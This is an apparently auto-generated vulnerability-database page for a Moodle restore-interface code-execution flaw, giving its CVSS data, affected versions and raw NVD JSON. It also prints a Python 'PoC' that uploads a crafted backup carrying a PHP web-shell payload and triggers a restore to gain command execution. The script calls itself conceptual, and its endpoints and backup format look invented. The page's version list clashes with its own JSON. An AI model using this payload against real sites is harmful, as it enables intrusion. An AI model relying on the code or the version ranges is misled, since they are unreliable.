Security Vulnerability Report
中文
CVE-2025-67847 CVSS 8.8 HIGH

CVE-2025-67847

Published: 2026-01-23 05:16:24
Last Modified: 2026-03-05 21:00:56
Source: [email protected]

Description

A flaw was found in Moodle. An attacker with access to the restore interface could trigger server-side execution of arbitrary code. This is due to insufficient validation of restore input, which leads to unintended interpretation by core restore routines. Successful exploitation could result in a full compromise of the Moodle application.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:moodle:moodle:5.1.0:-:*:*:*:*:*:* - VULNERABLE
Moodle LMS < 4.1.30
Moodle LMS < 4.4.24
Moodle LMS < 4.5.8
Moodle 3.11.x 系列所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67847 Moodle Restore RCE PoC # Note: This is a conceptual PoC for educational purposes only import requests import base64 import json TARGET_URL = "https://vulnerable-moodle-site.com" ATTACKER_TOKEN = "your_auth_token" def create_malicious_backup(): """Create a malicious backup file with embedded payload""" # Malicious PHP payload encoded in the backup payload = "<?php system($_GET['cmd']); ?>" # Construct malicious backup structure malicious_backup = { "backup_version": "3.11", "moodle_version": "2021051700", "backup_details": { "course_id": 1, "include_files": True, "include_user_data": True }, "injected_payload": base64.b64encode(payload.encode()).decode(), "restore_settings": { "overwrite_conflict": True, "delete_extra_files": False } } return json.dumps(malicious_backup) def exploit_restore_rce(): """Exploit the restore functionality to achieve RCE""" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Upload malicious backup file upload_url = f"{TARGET_URL}/backup/upload.php" malicious_backup = create_malicious_backup() upload_response = requests.post( upload_url, headers=headers, files={"backup_file": ("malicious_backup.mbz", malicious_backup)} ) if upload_response.status_code == 200: backup_id = upload_response.json().get("backup_id") # Trigger restore with malicious backup restore_url = f"{TARGET_URL}/backup/restore.php" restore_data = { "backup_id": backup_id, "target_course": 1, "restore_as_new_course": True } restore_response = requests.post( restore_url, headers=headers, json=restore_data ) print(f"Exploit sent. Check for RCE at: {TARGET_URL}/file.php?cmd=whoami") return restore_response.status_code == 200 return False if __name__ == "__main__": print("CVE-2025-67847 Moodle Restore RCE Exploit") print("Target: " + TARGET_URL) result = exploit_restore_rce() print(f"Exploitation {'successful' if result else 'failed'}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67847", "sourceIdentifier": "[email protected]", "published": "2026-01-23T05:16:24.250", "lastModified": "2026-03-05T21:00:56.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Moodle. An attacker with access to the restore interface could trigger server-side execution of arbitrary code. This is due to insufficient validation of restore input, which leads to unintended interpretation by core restore routines. Successful exploitation could result in a full compromise of the Moodle application."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en Moodle. Un atacante con acceso a la interfaz de restauración podría desencadenar la ejecución de código arbitrario del lado del servidor. Esto se debe a una validación insuficiente de la entrada de restauración, lo que lleva a una interpretación no intencionada por parte de las rutinas de restauración del núcleo. Una explotación exitosa podría resultar en un compromiso total de la aplicación Moodle."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.22", "matchCriteriaId": "A2DF3FD1-3A53-41D9-890B-F6DE973AB09C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.12", "matchCriteriaId": "73BDD52B-F279-4521-97B3-BCF12CB07384"}, {"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0", "versionEndExcluding": "4.5.8", "matchCriteriaId": "C0CC5CF8-4808-41A5-B8A1-B0D6C575E5DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.4", "matchCriteriaId": "06F81442-AEEB-483D-90A9-93DDBA5B95D6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:5.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "567FEE12-0E75-4F0C-B22E-E76990C80E1B"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-67847", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.